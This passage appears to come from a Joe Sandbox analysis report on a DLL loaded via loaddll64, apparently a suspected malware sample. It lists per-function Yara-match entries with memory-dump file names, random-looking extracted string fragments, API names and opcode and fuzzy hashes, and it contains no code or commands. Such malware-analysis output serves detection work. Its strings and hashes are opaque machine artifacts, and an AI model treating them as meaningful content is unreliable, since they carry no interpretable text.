                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: =1Z$h^$h
                                                                                                        • API String ID: 0-2636329743
                                                                                                        • Opcode ID: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                        • Instruction ID: b01e88b6b57ba4d7dccfa73d8ad07d3cee0fb8b291d2e61316bf3d6cb9ca5404
                                                                                                        • Opcode Fuzzy Hash: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
                                                                                                        • Instruction Fuzzy Hash: 42E1D9705087C8CBEBBECF64C8897DA7BA8FB44708F10561DE94A9E258DB745749CB01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: V$bVZ$o(
                                                                                                        • API String ID: 0-1660054416
                                                                                                        • Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                        • Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
                                                                                                        • Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                        • Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #X$$&]$m%K
                                                                                                        • API String ID: 0-1065608980
                                                                                                        • Opcode ID: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                        • Instruction ID: 281ae2356dc6a3955f278cfb62bb8b0cbfc4af089bf5b994b6edc0547db548b7
                                                                                                        • Opcode Fuzzy Hash: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                        • Instruction Fuzzy Hash: 48C179B1A0460DCFDB68DF78D15A5DD7BF1BB48308F206129F8269A2A2E374A509CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: K#$LI$cn
                                                                                                        • API String ID: 0-3773415493
                                                                                                        • Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                        • Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
                                                                                                        • Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                        • Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$Is$^F
                                                                                                        • API String ID: 0-4110932142
                                                                                                        • Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                        • Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
                                                                                                        • Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                        • Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0ZI$4$dUn
                                                                                                        • API String ID: 0-3362017604
                                                                                                        • Opcode ID: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                        • Instruction ID: 064bfcd7f6638f6f98711acfe7d0f42a6c132ae3c1731c2332aecbaa5a5ea63a
                                                                                                        • Opcode Fuzzy Hash: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                        • Instruction Fuzzy Hash: 0B712B7050C7888FD7B9DF28C5856DEBBF5FB85744F10491DE68A8B2A0CB769A44CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: O$[_K&$j
                                                                                                        • API String ID: 0-2002151384
                                                                                                        • Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                        • Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
                                                                                                        • Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                        • Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -h$WT$>"I
                                                                                                        • API String ID: 0-2979910649
                                                                                                        • Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                        • Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
                                                                                                        • Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                        • Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 34$I$s$-
                                                                                                        • API String ID: 0-2987712878
                                                                                                        • Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                        • Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
                                                                                                        • Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                        • Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3W$sR$v
                                                                                                        • API String ID: 0-1518777123
                                                                                                        • Opcode ID: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                        • Instruction ID: c80d461967320ed9e8a283cc826d951d9acd29724fcff4159453b991850cd8cf
                                                                                                        • Opcode Fuzzy Hash: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                        • Instruction Fuzzy Hash: 7341B7B190034A8FDB48CF64C48A5DE7FB1FB58398F504619FC55A6290D3B896A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >$Da$p
                                                                                                        • API String ID: 0-3088490888
                                                                                                        • Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                        • Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
                                                                                                        • Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                        • Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Y$[?$z
                                                                                                        • API String ID: 0-81702474
                                                                                                        • Opcode ID: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                        • Instruction ID: 17df8d7d90ce60fd82a33c040225e484019840e26e547c8a3bada95d9f576c07
                                                                                                        • Opcode Fuzzy Hash: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                        • Instruction Fuzzy Hash: CF41E2705187859BD398DF68C48991FBBF0FBC5388F906A1DF982866A0C7B4D958CB43
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %i$J_d$o
                                                                                                        • API String ID: 0-2302849290
                                                                                                        • Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                        • Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
                                                                                                        • Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                        • Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %.&$~!$z
                                                                                                        • API String ID: 0-3431779881
                                                                                                        • Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                        • Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
                                                                                                        • Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                        • Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$B3$J:
                                                                                                        • API String ID: 0-3064689667
                                                                                                        • Opcode ID: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                        • Instruction ID: 182ec4a01b3342a6bdc382118e07b0b009bb3174144ecf8c9284c759066334ab
                                                                                                        • Opcode Fuzzy Hash: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                        • Instruction Fuzzy Hash: 1E41F3B090078E8FDB48CF24C88A0DE7BB0FB58358F114A1DEC56A6290D3B89664CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Ks$ie$p7
                                                                                                        • API String ID: 0-1618259084
                                                                                                        • Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                        • Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
                                                                                                        • Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                        • Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N=?S$v$}j
                                                                                                        • API String ID: 0-4092938293
                                                                                                        • Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                        • Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
                                                                                                        • Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                        • Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2`$XS$WFY
                                                                                                        • API String ID: 0-4220438673
                                                                                                        • Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                        • Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
                                                                                                        • Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                        • Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 15204871-0
                                                                                                        • Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                        • Instruction ID: 23a240b145e3a022138788d5e324d51ddc45cd30466ee380d2a29fab2e50e3d2
                                                                                                        • Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                        • Instruction Fuzzy Hash: F2B15C77A04B998BEB15CF2DCC4236C3BA0F784B49F148922DA5D877A8CB39D451CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BinaryCryptString
                                                                                                        • String ID:
                                                                                                        • API String ID: 80407269-0
                                                                                                        • Opcode ID: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
                                                                                                        • Instruction ID: cf8877437105a0406a194d4f0affce2c2556e7e3513cc74a70ae84c3bbd16cf8
                                                                                                        • Opcode Fuzzy Hash: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
                                                                                                        • Instruction Fuzzy Hash: F521413261CB598AEB50DF19E88072AB3A0F7C5796F404026EA8D83BE5CF7DD444CB18
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Y6}$d9(4
                                                                                                        • API String ID: 0-3330832364
                                                                                                        • Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                        • Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
                                                                                                        • Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                        • Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?T~$LPX
                                                                                                        • API String ID: 0-3819494200
                                                                                                        • Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                        • Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
                                                                                                        • Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                        • Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5]w$K>DO
                                                                                                        • API String ID: 0-1721466923
                                                                                                        • Opcode ID: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                        • Instruction ID: 7ff9c6c976455071c2a9df6d60b89cf37126c55da19abf4d4cee6ceb2b958208
                                                                                                        • Opcode Fuzzy Hash: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                        • Instruction Fuzzy Hash: 0BB1227550234CCBEBA9DF68D1CA6DD7BE1EF24344F104019FC5A9A2A2C774D929CB48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: lqCn$m[l
                                                                                                        • API String ID: 0-3128696216
                                                                                                        • Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                        • Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
                                                                                                        • Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                        • Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Nt$U
                                                                                                        • API String ID: 0-2773090818
                                                                                                        • Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                        • Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
                                                                                                        • Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                        • Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #X$Us
                                                                                                        • API String ID: 0-3203413852
                                                                                                        • Opcode ID: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                        • Instruction ID: 41232c5cd5cce4775d7c49e7c64c552743a4e7719aa725caeeb3acb0d5dfb118
                                                                                                        • Opcode Fuzzy Hash: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                        • Instruction Fuzzy Hash: 54B167B590070DCFEB98DF28C18A59D3BA9FF55308F404129FC1E962A1E3B8E518CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %R$tt"
                                                                                                        • API String ID: 0-772664118
                                                                                                        • Opcode ID: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                        • Instruction ID: 8fbc46d1b7e2f611e930d46153dfa18b699fa5ceb3b757a8db7b1acf46b52deb
                                                                                                        • Opcode Fuzzy Hash: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                        • Instruction Fuzzy Hash: 09813C7051474D8BDF98CF28C8896ED3BA0FB48398F565319FD4AA6390CB78D585CB84
